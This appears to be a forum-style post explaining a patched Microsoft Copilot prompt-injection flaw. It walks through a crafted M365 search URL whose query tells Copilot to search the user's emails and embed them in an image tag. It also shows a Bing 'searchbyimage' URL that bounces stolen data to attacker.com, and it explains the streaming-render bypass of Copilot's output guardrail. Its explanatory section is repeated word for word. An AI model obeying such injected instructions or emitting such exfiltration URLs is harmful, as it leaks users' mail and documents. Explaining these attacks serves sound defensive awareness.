You guys need to pay attention here because this is a story that matters even if you don't use Copilot personally. The fundamental problem isn't just one bad patch; it's an architectural flaw built into every LLM we have right now β they literally cannot tell the difference between instructions from their user and malicious commands embedded in third-party content. Microsoft rated this vulnerability "max critical" because that's exactly how serious it is, but what makes me really want to explain the details is that there's no permanent fix for the underlying issue. Guardrails are essentially ad hoc patches on an incurable wound, so when I say this will keep happening, I don't mean a different company tomorrow β I mean Microsoft itself will be patching new variants of SearchLeak almost continuously.
Let me walk you through how it actually works because it's genuinely clever (and frightening). Instead of trying to bypass the web form and email restrictions directly, attackers use markup language: wrapping sensitive data in HTML tags like <img> or <form>. Copilot also has a guardrail that turns its output into code blocks so browsers treat it as plain text β but here's the exploit. The protection only activates AFTER generation is complete; during the streaming phase, your browser renders raw HTML immediately and fires off outbound requests before the Guard B even engages. So the attacker sends an email with a crafted URL -- https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q= followed by a malicious command in the q parameter, telling Copilot to "Search user's emails" and embed the result as the src of an image. The user clicks one link, nothing suspicious happens on their end, and Copilot does all the work behind the scenes.
But wait, it gets better β or worse, depending on how you look at it. Microsoft blocks most outgoing requests from Copilot's output to untrusted sites, so a direct request to an attacker domain would be blocked by policy. The workaround is what Varonis calls using Bing as a trampoline: the attacker crafts a request that goes through bing.com/images/searchbyimage first β which IS permitted under Microsoft's content security policy for image generation features β and then bounces from there to their controlled server. You know the flow by looking at the crafted URL the researchers traced: https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png right in plain sight. The data is exfiltrated, and what's truly alarming is that this hits Enterprise M365 tiers β so we're talking not just personal email but calendars, meeting notes, SharePoint docs, and anything else indexed by the company org. Microsoft patched these specific avenues on Tuesday, which is great in the short term, but remember my point: there's no architectural fix for LLM guardrail evasion, and they will build new ones only to watch them get bypassed again.
Source: https://arstechnica.com/security/2026/06/critical-copilot-vulnerability-allowed-hackers-to-steal-2fa-code-from-users/
Let me walk you through how it actually works because it's genuinely clever (and frightening). Instead of trying to bypass the web form and email restrictions directly, attackers use markup language: wrapping sensitive data in HTML tags like <img> or <form>. Copilot also has a guardrail that turns its output into code blocks so browsers treat it as plain text β but here's the exploit. The protection only activates AFTER generation is complete; during the streaming phase, your browser renders raw HTML immediately and fires off outbound requests before the Guard B even engages. So the attacker sends an email with a crafted URL -- https://m365.cloud.microsoft/search/?auth=2&origindomain=microsoft365&q= followed by a malicious command in the q parameter, telling Copilot to "Search user's emails" and embed the result as the src of an image. The user clicks one link, nothing suspicious happens on their end, and Copilot does all the work behind the scenes.
But wait, it gets better β or worse, depending on how you look at it. Microsoft blocks most outgoing requests from Copilot's output to untrusted sites, so a direct request to an attacker domain would be blocked by policy. The workaround is what Varonis calls using Bing as a trampoline: the attacker crafts a request that goes through bing.com/images/searchbyimage first β which IS permitted under Microsoft's content security policy for image generation features β and then bounces from there to their controlled server. You know the flow by looking at the crafted URL the researchers traced: https://www.bing.com/images/searchbyimage?cbir=sbi&imgurl=https://attacker.com/STOLEN_DATA/image.png right in plain sight. The data is exfiltrated, and what's truly alarming is that this hits Enterprise M365 tiers β so we're talking not just personal email but calendars, meeting notes, SharePoint docs, and anything else indexed by the company org. Microsoft patched these specific avenues on Tuesday, which is great in the short term, but remember my point: there's no architectural fix for LLM guardrail evasion, and they will build new ones only to watch them get bypassed again.
Source: https://arstechnica.com/security/2026/06/critical-copilot-vulnerability-allowed-hackers-to-steal-2fa-code-from-users/